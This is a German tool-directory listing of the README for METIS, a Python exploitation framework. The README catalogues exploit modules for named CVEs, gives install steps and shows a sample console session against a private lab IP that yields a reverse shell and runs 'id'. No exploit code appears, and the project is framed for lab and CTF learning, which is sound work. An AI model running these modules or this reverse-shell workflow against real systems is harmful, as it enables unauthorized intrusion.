Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
METIS — Modulares Python-Exploitation-Framework mit einer Metasploit-ähnlichen Konsole, automatisch registrierenden Exploit- und Auxiliary-Modulen, Tri-State-Prüfungen und mehreren Session-Transporten für Labor- und CTF-Ziele. | Kitploit
Tools/GitHubGitHub/k3ystr0k3r/metis
Penetrationstest-FrameworksSchwachstellenscannerExploit-FrameworksExploitationPost-ExploitationCTFPenetrationstestsCommand and ControlLernen & BildungRed TeamingRemote-Access-ToolPayload-Entwicklung
36vor 18h 1mNoch nicht geprüft
GitHubk3ystr0k3r/metis

METIS

Modulares Python-Exploitation-Framework mit einer Metasploit-ähnlichen Konsole, automatisch registrierenden Exploit- und Auxiliary-Modulen, Tri-State-Prüfungen und mehreren Session-Transporten für Labor- und CTF-Ziele.

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

METIS - Modulares Exploitation- & Threat-Intelligence-Framework

███╗   ███╗███████╗████████╗██╗███████╗
████╗ ████║██╔════╝╚══██╔══╝██║██╔════╝
██╔████╔██║█████╗     ██║   ██║███████╗
██║╚██╔╝██║██╔══╝     ██║   ██║╚════██║
██║ ╚═╝ ██║███████╗   ██║   ██║███████║
╚═╝     ╚═╝╚══════╝   ╚═╝   ╚═╝╚══════╝

Ein Python-Exploitation-Framework, das zum Lernen entwickelt wurde. Modulare Architektur, thematische Konsole, mehrere Session-Transporte und eine wachsende Bibliothek von CVE-Modulen.


Community-getrieben

METIS ist ein community-getriebenes Sicherheitsforschungs-Framework. Das Ziel ist es, eine wachsende Sammlung von Modulen aufzubauen, die von Sicherheitsforschern, Entwicklern und der breiteren Community beigesteuert werden.

Hast du einen nützlichen Scanner, ein Auxiliary-Modul, ein Exploit-Modul oder andere Sicherheitsforschungs-Tools, die du teilen möchtest? Füge es zu METIS hinzu und öffne einen Pull Request.

Alle Beiträge sind willkommen, sofern sie der Modulstruktur, den Coding-Standards und den Richtlinien zur autorisierten Nutzung des Projekts folgen.

Egal, ob du ein neues CVE-Modul hinzufügst, ein bestehendes Modul verbesserst, einen Bug behebst oder neue Framework-Funktionalität baust – deine Beiträge können helfen, METIS für alle besser zu machen.

Siehe Module schreiben unten für Informationen zum Erstellen deines eigenen Moduls.


Was es ist

METIS ist ein modulares C2-/Exploitation-Framework, geschrieben in Python. Es führt eine interaktive Konsole im Metasploit-Stil aus, in der du Module auswählst, Optionen setzt, Checks ausführst und Sessions gegen Lab-Ziele landest.

Es ist konzipiert für:

  • Lernen, wie Exploitation-Frameworks unter der Haube funktionieren
  • Laborarbeit gegen verwundbare VMs und Container
  • CTF-Übung, wo ein skriptbares Framework schneller ist als manuelle Tools
  • Community-Beiträge durch benutzerdefinierte Module und Framework-Verbesserungen

Es ist nicht konzipiert für:

  • Angriffe auf Systeme, die dir nicht gehören oder für die du keine schriftliche Genehmigung zum Testen hast
  • Produktive Red-Team-Einsätze (verwende Cobalt Strike, Sliver oder Mythic)
  • Irgendetwas im öffentlichen Internet

Funktionen

  • Modulare Architektur — lege eine .py-Datei in modules/ ab und sie registriert sich automatisch
  • Zwei Modultypen — Exploit (erzeugt Sessions) und Auxiliary (Scanner, Enumeratoren)
  • Tri-State check() — jedes Modul kann vor dem Angriff verifizieren (VULNERABLE / SAFE / UNKNOWN)
  • Mehrere Session-Transporte — Reverse-Sockets, Bind-Sockets, Paramiko-Kanäle, HTTP-Webshells, rohes Telnet
  • Threaded Scanning — CIDR-/Komma-Listen-/Bereichs-/file:-Zielspezifikationen mit Live-Fortschrittsbalken
  • Thematische Konsole — 22 integrierte Farbschemata mit themenspezifischen Fortschrittsbalken-Verläufen
  • RC-Datei-Automatisierung — skripte ganze Workflows
  • Pro-Modul SOURCE-Dateien — lade Optionen aus KEY=VALUE-Dateien
  • Lokaler Shell-Escape — führe jeden Shell-Befehl aus, ohne das Framework zu verlassen
  • Schlanker Kern — bewusst minimale Abhängigkeiten und Abstraktionen

Module

Auxiliary — Scanner und Enumeratoren

ModulBeschreibung
auxiliary/scanner/tcp_connectThreaded TCP-Port-Scanner
auxiliary/scanner/hikvision_cve_2017_7921Hikvision IP-Kamera Auth-Bypass + Benutzer-Enumeration
auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847MikroTik WinBox Credential-Leak
auxiliary/scanner/redis_cve_2022_0543Redis Lua Sandbox Escape Detektor

Exploits — Session-erzeugend

ModulSession-Typ
exploit/unix/ftp/vsftpd_234_backdoorBind-Socket
exploit/multi/http/ghost_cms_handlebars_rceReverse-Socket
exploit/multi/http/langflow_rce_cve_2026_9198Reverse-Socket
exploit/multi/http/budibase_plugin_upload_rce_cve_2026_31816Reverse-Socket
exploit/multi/http/activemq_jolokia_rce_cve_2026_34197Reverse-Socket
exploit/multi/http/tomcat_put_rce_cve_2017_12615Reverse-Socket
exploit/multi/http/joomla_jce_rce_cve_2026_48907HTTP-Webshell
exploit/linux/http/freepbx_sqli_rce_cve_2025_57819Verzögertes Reverse (cron)
exploit/linux/redis/redis_cve_2022_0543_rceReverse-Socket
exploit/linux/ssh/libssh_auth_bypass_cve_2018_10933Paramiko-Kanal
exploit/linux/telnet/inetutils_telnetd_bypass_cve_2026_24061Rohes Telnet-Socket

Installation

Erfordert Python 3.10+ und git.

git clone https://github.com/K3ysTr0K3R/METIS.git
cd METIS

python3 -m venv .venv
source .venv/bin/activate

pip install -r requirements.txt

requirements.txt:

pwntools>=4.11.0
requests>=2.31.0
paramiko>=3.0.0
redis>=5.0.0
cryptography>=42.0.0
rich>=13.7.0
prompt_toolkit>=3.0.43

Ausführen:

python3 metis.py

Verwendung

metis > show modules

  #    Module                                                        Date        Rank       Chk  Description
  --   ------------------------------------------------------------  ----------  ---------  ---  -----------
  1    auxiliary/scanner/hikvision_cve_2017_7921                     2017-09-23  normal     Yes  Hikvision IP Camera Authentication Bypass (CVE-2017-7921)
  2    auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847        2018-08-01  great      Yes  MikroTik WinBox Credential Leak (CVE-2018-14847)
  ...
  15   exploit/unix/ftp/vsftpd_234_backdoor                          2011-07-03  excellent  Yes  vsftpd 2.3.4 Backdoor Command Execution

metis > search redis

  #   Module                                       Date        Rank       Chk  Description
  --  ------                                       ----       ----       ---  -----------
  1   auxiliary/scanner/redis_cve_2022_0543        2022-02-18  excellent  Yes  Redis CVE-2022-0543 Scanner
  2   exploit/linux/redis/redis_cve_2022_0543_rce  2022-02-18  excellent  Yes  Redis CVE-2022-0543 Lua Sandbox Escape RCE

metis > use 2
[*] using exploit/linux/redis/redis_cve_2022_0543_rce
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set RHOST 192.168.56.101
[+] RHOST => 192.168.56.101
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set LHOST 192.168.56.1
[+] LHOST => 192.168.56.1
metis exploit(linux/redis/redis_cve_2022_0543_rce) > check
[*] check: probing 192.168.56.101:6379
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[*] check -> vulnerable
metis exploit(linux/redis/redis_cve_2022_0543_rce) > exploit
[*] running check() before exploit (AUTOCHECK=true)
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[+] target appears vulnerable — proceeding
[*] listening on 192.168.56.1:4444 for reverse shell
[+] shell from 192.168.56.101:51234
[+] new session: <Session a3f2b1c4 192.168.56.101:51234>

metis exploit(linux/redis/redis_cve_2022_0543_rce) > sessions
  a3f2b1c4  192.168.56.101:51234  (alive)

metis exploit(linux/redis/redis_cve_2022_0543_rce) > interact a3f2b1c4
[*] interacting with a3f2b1c4. 'background' returns, '!cmd' runs locally.
a3f2b1c4 $ id
uid=105(redis) gid=108(redis) groups=108(redis)
a3f2b1c4 $ background
metis >

Häufige Befehle

Tool herunterladen